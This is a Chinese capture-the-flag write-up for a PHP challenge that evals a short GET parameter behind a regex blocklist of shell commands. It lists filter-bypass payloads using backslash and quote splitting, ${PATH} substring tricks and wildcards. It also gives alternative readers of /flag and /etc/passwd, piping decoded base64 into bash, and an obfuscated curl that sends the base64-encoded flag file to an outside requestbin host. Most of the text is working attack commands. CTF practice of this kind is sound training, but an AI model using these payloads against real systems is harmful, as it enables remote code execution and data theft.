源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-16 18:48:03
*/
error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){
eval(substr($F,0,6));
}else{
die("师傅们居然破解了前面的,那就来一个加强版吧");
}
}
思路
非预期
可以用这些绕过关键字过滤
\
'
"
可以参考下我的博客
下面可以选一个能用的输出flag,curl不能用可以用ping
od
nl
nl
${PATH:${#TERM}:${SHLVL:~A}}${PATH:${#RANDOM}:${#SHLVL:~A}}
${PATH:~A}${PATH:${#RANDOM}:${#SHLVL:~A}}
/bin/cat
${HOME:${#}:${##}}???${HOME:${#}:${##}}??${HOME:${#HOSTNAME}:${#SHLVL}}
xxd
less
ca\t
ca''t
more
rev
/bin/rev
fmt
base64
/bin/base64
code=${HOME:${#}:${##}}???${HOME:${#}:${##}}?????${#RANDOM}
tac
| cat的倒序
tail
php /flag
sh /flag
| 利用报错出flag
paste /flag /etc/passwd
| 可以两个一起读
diff /flag.txt /etc/passwd
curl file:///flag
sed -n "p" /flag
bzless /flag
bzmore /flag
sort
echo "[base64==]" | base64 -d | bash
echo "[hex]" | xxd -r -p | bash
盲注的话可以${string:start:length}
来截取字符
题解
cu\rl https://requestbin.net/r/d6dln1sn?q=`ca\t flag.php | gr\ep flag | bas\e64`
cu\rl https://requestbin.net/r/d6dln1sn?q=`ca\t flag.php | gr\ep flag2 | bas\e64`
拼一下就好了
总结
Y1ng师傅 yyds